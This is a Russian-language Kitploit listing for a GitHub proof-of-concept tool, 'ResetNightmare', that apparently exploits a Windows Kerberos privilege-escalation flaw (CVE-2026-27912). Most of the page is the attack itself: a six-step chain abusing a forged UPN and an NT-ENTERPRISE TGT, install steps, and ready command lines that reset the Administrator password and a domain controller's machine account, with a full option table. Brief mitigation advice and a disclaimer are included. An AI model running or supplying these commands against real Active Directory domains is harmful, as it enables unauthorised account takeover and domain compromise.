Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Kerberos-CVE-2026-27912 — PoC для CVE-2026-27912 - повышение привилегий в Windows Kerberos (ResetNightmare). Несанкционированный сброс пароля через уязвимость Kerberos. Только для исследований в области безопасности. | Kitploit
Инструменты/GitHubGitHub/oxstussz-eng/kerberos-cve-2026-27912
Аутентификация и авторизацияПовышение привилегийАтаки на ПаролиЭксплуатацияТестирование на Проникновение
GitHuboxstussz-eng/kerberos-cve-2026-27912

Kerberos-CVE-2026-27912

PoC для CVE-2026-27912 - повышение привилегий в Windows Kerberos (ResetNightmare). Несанкционированный сброс пароля через уязвимость Kerberos. Только для исследований в области безопасности.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
21026 дней назадЕщё не проверено

Kerberos-CVE-2026-27912

CVE-2026-27912 — уязвимость повышения привилегий Windows Kerberos

ResetNightmare — несанкционированный сброс пароля через ошибку протокола смены пароля Kerberos.


📋 Сведения

ПолеЗначение
CVECVE-2026-27912
НазваниеУязвимость повышения привилегий Windows Kerberos
CVSS8.0 HIGH (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CWECWE-285: Некорректная авторизация
Опубликовано14 апреля 2026 г.
Исправленоапрель 2026 г.

🔍 Схема атаки

root@kitploit:~
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success

📦 Требования

  • Windows с PowerShell
  • Модуль ActiveDirectory (Install-WindowsFeature RSAT-AD-PowerShell)
  • Rubeus.exe (скачать с GhostPack/Rubeus)
  • Сетевой доступ к контроллеру домена

🚀 Установка

root@kitploit:~
# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912

# Install dependencies
pip install -r requirements.txt

💻 Использование

Базовая атака

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass

Атака на учётную запись компьютера

root@kitploit:~
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c

Создание новой учётной записи

root@kitploit:~
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"

Подробный режим

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v

📊 Аргументы


🛡️ Меры по устранению

  1. Установите официальный патч из обновления безопасности Microsoft
  2. Сегментируйте сеть, чтобы ограничить доступ через смежную сеть
  3. Соблюдайте принцип минимальных привилегий — ограничьте права на запись UPN
  4. Отслеживайте подозрительные изменения UPN и сбросы паролей

⚠️ Отказ от ответственности

Только для авторизованного тестирования безопасности и образовательных исследований.

Несанкционированный доступ к компьютерным системам противозаконен. Автор не несёт ответственности за неправомерное использование данного программного обеспечения.


📚 Ссылки

  • NVD: CVE-2026-27912
  • Руководство по обновлениям безопасности Microsoft

👨‍💻 Автор

n0vax1337 / Исследователь безопасности


📄 Лицензия

Лицензия MIT — см. LICENSE


Последнее обновление: 2026

Скачать инструмент
ФлагОписаниеПо умолчанию
-t / --targetИмя целевой учётной записиобязательно
-p / --new-passwordНовый пароль для целевой учётной записиобязательно
-u / --upn-userУчётная запись для установки поддельного UPNобязательно
-up / --upn-passwordПароль для UPN-учётной записиобязательно
-c / --computerUPNUser — учётная запись компьютерафлаг
-r / --rubeus-pathПуть к Rubeus.exeRubeus.exe
-e / --encryptionПоддерживаемый тип шифрованияAES256
-path / --create-pathПуть OU для создания новой учётной записи""
-d / --dcИмя контроллера доменаавтоопределение
-v / --verboseПодробный выводфлаг